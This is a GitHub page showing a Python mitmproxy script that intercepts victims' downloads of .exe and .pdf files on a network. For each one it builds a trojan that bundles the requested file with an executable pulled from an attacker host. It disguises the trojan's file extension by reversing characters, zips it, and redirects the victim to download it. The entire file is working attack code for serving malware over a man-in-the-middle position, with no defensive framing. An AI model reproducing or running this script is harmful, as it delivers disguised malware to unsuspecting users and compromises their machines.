-
Notifications
You must be signed in to change notification settings - Fork 80
Expand file tree
/
Copy pathmitmproxy_script.py
More file actions
45 lines (33 loc) · 1.41 KB
/
mitmproxy_script.py
File metadata and controls
45 lines (33 loc) · 1.41 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import mitmproxy
import subprocess
import os
from Trojan import *
IP = "192.168.188.171"
TARGET_TEXTENSIONS = [".exe", ".pdf"]
EVIL_FILE = "http://192.168.188.171/file.exe"
WEB_ROOT = "/var/www/html/"
SPOOF_EXTENSION = True
def request(flow):
#code to handle request flows
if flow.request.host != IP and flow.request.pretty_url.endswith(tuple(TARGET_TEXTENSIONS)):
print("[+] Got interesting flow")
front_file_name = flow.request.pretty_url.split("/")[-1].split(".")[0]
front_file = flow.request.pretty_url + "#"
download_file_name = front_file_name + ".exe"
trojan_file = WEB_ROOT + download_file_name
print("[+] Generating a trojan for " + flow.request.pretty_url)
mitm = True
trojan = Trojan(front_file, EVIL_FILE, None, trojan_file, IP)
trojan.create(mitm)
trojan.compile()
if SPOOF_EXTENSION == True:
print("[+] Renaming trojan to spoof its extension")
front_file_extension = flow.request.pretty_url.split("/")[-1].split(".")[-1]
if front_file_extension != "exe":
new_name = front_file_name + "" + "".join(reversed(front_file_extension)) + ".exe"
spoofed_file = WEB_ROOT + new_name
os.rename(trojan_file, spoofed_file)
trojan.zip(spoofed_file)
download_file_name = front_file_name + ".zip"
torjan_download_url = "http://" + IP + "/" + download_file_name
flow.response = mitmproxy.http.Response.make(301, "", {"Location": torjan_download_url})